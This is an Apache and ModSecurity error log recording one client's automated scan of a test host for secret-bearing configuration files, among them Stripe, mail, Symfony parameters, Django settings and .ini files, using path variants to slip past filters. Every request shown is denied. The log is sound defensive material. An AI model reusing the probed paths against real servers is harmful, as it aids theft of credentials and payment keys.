[Fri Jan 16 03:15:35.271928 2026] [:error] [pid 1444032] [client 45.148.10.246:53948] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/services.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/services.yml found within REQUEST_FILENAME: /config/services.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR-kMvq8uPO2ZciWpLgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/services.yml
[Fri Jan 16 03:15:35.272157 2026] [:error] [pid 1444032] [client 45.148.10.246:53948] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR-kMvq8uPO2ZciWpLgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/services.yml
[Fri Jan 16 03:15:35.272305 2026] [:error] [pid 1444032] [client 45.148.10.246:53948] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR-kMvq8uPO2ZciWpLgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/services.yml
[Fri Jan 16 03:15:35.421865 2026] [:error] [pid 1444031] [client 45.148.10.246:53962] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/services.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/services.yml found within REQUEST_FILENAME: /config/services.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR3-9MmrgwjmYTAJQ8wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/services.yml
[Fri Jan 16 03:15:35.422102 2026] [:error] [pid 1444031] [client 45.148.10.246:53962] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR3-9MmrgwjmYTAJQ8wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/services.yml
[Fri Jan 16 03:15:35.422257 2026] [:error] [pid 1444031] [client 45.148.10.246:53962] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfR3-9MmrgwjmYTAJQ8wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/services.yml
[Fri Jan 16 03:15:38.469807 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:54112] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/parameters.yml
[Fri Jan 16 03:15:38.640699 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:54114] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/parameters.yml/
[Fri Jan 16 03:15:38.779622 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:54116] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/parameters.yml
[Fri Jan 16 03:15:38.906960 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:54124] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/parameters.yml
[Fri Jan 16 03:15:39.048214 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:54138] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/parameters.yaml
[Fri Jan 16 03:15:39.193883 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:54148] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/parameters.yaml/
[Fri Jan 16 03:15:39.388339 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:35230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/parameters.yaml
[Fri Jan 16 03:15:39.539899 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:35242] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/parameters.yaml
[Fri Jan 16 03:15:39.730223 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:35254] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/config_mail.yml
[Fri Jan 16 03:15:39.932898 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:35258] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/config_mail.yml/
[Fri Jan 16 03:15:40.083042 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:35274] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/config_mail.yml
[Fri Jan 16 03:15:40.245316 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:35286] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/config_mail.yml
[Fri Jan 16 03:15:40.568395 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:35290] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/config_mail.yaml/
[Fri Jan 16 03:15:40.680762 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:35298] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/config_mail.yaml
[Fri Jan 16 03:15:40.800972 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:35308] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/config_mail.yaml
[Fri Jan 16 03:15:40.967464 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:35324] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/email.yml
[Fri Jan 16 03:15:41.101305 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:35338] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/email.yml/
[Fri Jan 16 03:15:41.289023 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:35352] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/email.yml
[Fri Jan 16 03:15:41.449813 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:35358] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/email.yml
[Fri Jan 16 03:15:41.655645 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:35366] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/email.yaml
[Fri Jan 16 03:15:41.787185 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:35370] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/email.yaml/
[Fri Jan 16 03:15:41.947823 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:35376] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/email.yaml
[Fri Jan 16 03:15:42.097266 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:35382] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/email.yaml
[Fri Jan 16 03:15:42.313806 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:35386] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.yml
[Fri Jan 16 03:15:42.481537 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:35392] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.yml/
[Fri Jan 16 03:15:42.634040 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:35398] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.yml
[Fri Jan 16 03:15:42.792670 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:35404] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.yml
[Fri Jan 16 03:15:42.936670 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:35416] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.yaml
[Fri Jan 16 03:15:43.285089 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:35432] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.yaml
[Fri Jan 16 03:15:43.421177 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:35444] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.yaml
[Fri Jan 16 03:15:58.018676 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:54728] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com/app/config.py
[Fri Jan 16 03:15:58.180335 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:54732] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com/app/config.py/
[Fri Jan 16 03:15:58.336757 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:54744] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com//app/config.py
[Fri Jan 16 03:15:58.500548 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:54760] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com/./app/config.py
[Fri Jan 16 03:15:58.654018 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:54762] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py, referer: http://economiasolidale.test.indacotrentino.com/app/settings.py
[Fri Jan 16 03:15:58.807456 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:54766] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py, referer: http://economiasolidale.test.indacotrentino.com/app/settings.py/
[Fri Jan 16 03:15:58.986380 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:54772] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py, referer: http://economiasolidale.test.indacotrentino.com//app/settings.py
[Fri Jan 16 03:15:59.116031 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:54788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py, referer: http://economiasolidale.test.indacotrentino.com/./app/settings.py
[Fri Jan 16 03:16:03.293226 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:40808] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com/app/config.py
[Fri Jan 16 03:16:03.655372 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:40876] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com//app/config.py
[Fri Jan 16 03:16:03.784071 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:40912] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.py, referer: http://economiasolidale.test.indacotrentino.com/./app/config.py
[Fri Jan 16 03:16:03.950976 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:40938] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/app/core/config.py
[Fri Jan 16 03:16:04.135932 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41024] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/app/core/config.py/
[Fri Jan 16 03:16:04.321237 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:41086] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com//app/core/config.py
[Fri Jan 16 03:16:04.507747 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41142] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/./app/core/config.py
[Fri Jan 16 03:16:04.636337 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41186] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/app/core/settings.py
[Fri Jan 16 03:16:04.760155 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41240] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/app/core/settings.py/
[Fri Jan 16 03:16:04.921412 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:41294] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com//app/core/settings.py
[Fri Jan 16 03:16:05.084062 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41336] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/core, referer: http://economiasolidale.test.indacotrentino.com/./app/core/settings.py
[Fri Jan 16 03:16:09.190396 2026] [:error] [pid 1444035] [client 45.148.10.246:42570] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfabauW6yeGWXfDeFWtgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/development.ini
[Fri Jan 16 03:16:09.190733 2026] [:error] [pid 1444035] [client 45.148.10.246:42570] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfabauW6yeGWXfDeFWtgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/development.ini
[Fri Jan 16 03:16:09.190903 2026] [:error] [pid 1444035] [client 45.148.10.246:42570] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfabauW6yeGWXfDeFWtgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/development.ini
[Fri Jan 16 03:16:09.536442 2026] [:error] [pid 1444031] [client 45.148.10.246:46284] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfaX-9MmrgwjmYTAJRaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//development.ini
[Fri Jan 16 03:16:09.536776 2026] [:error] [pid 1444031] [client 45.148.10.246:46284] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfaX-9MmrgwjmYTAJRaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//development.ini
[Fri Jan 16 03:16:09.536949 2026] [:error] [pid 1444031] [client 45.148.10.246:46284] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfaX-9MmrgwjmYTAJRaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//development.ini
[Fri Jan 16 03:16:09.661087 2026] [:error] [pid 1444033] [client 45.148.10.246:46286] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfadLJkp65ULFQ2YYhWAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./development.ini
[Fri Jan 16 03:16:09.661410 2026] [:error] [pid 1444033] [client 45.148.10.246:46286] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfadLJkp65ULFQ2YYhWAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./development.ini
[Fri Jan 16 03:16:09.661578 2026] [:error] [pid 1444033] [client 45.148.10.246:46286] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development.ini"] [unique_id "aWmfadLJkp65ULFQ2YYhWAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./development.ini
[Fri Jan 16 03:16:09.796951 2026] [:error] [pid 1444034] [client 45.148.10.246:46294] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaeRfEYyDES-ZFL4hTAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/production.ini
[Fri Jan 16 03:16:09.797288 2026] [:error] [pid 1444034] [client 45.148.10.246:46294] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaeRfEYyDES-ZFL4hTAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/production.ini
[Fri Jan 16 03:16:09.797463 2026] [:error] [pid 1444034] [client 45.148.10.246:46294] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaeRfEYyDES-ZFL4hTAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/production.ini
[Fri Jan 16 03:16:10.198826 2026] [:error] [pid 1444032] [client 45.148.10.246:46300] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/production.ini"] [unique_id "aWmfaukMvq8uPO2ZciWpTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//production.ini
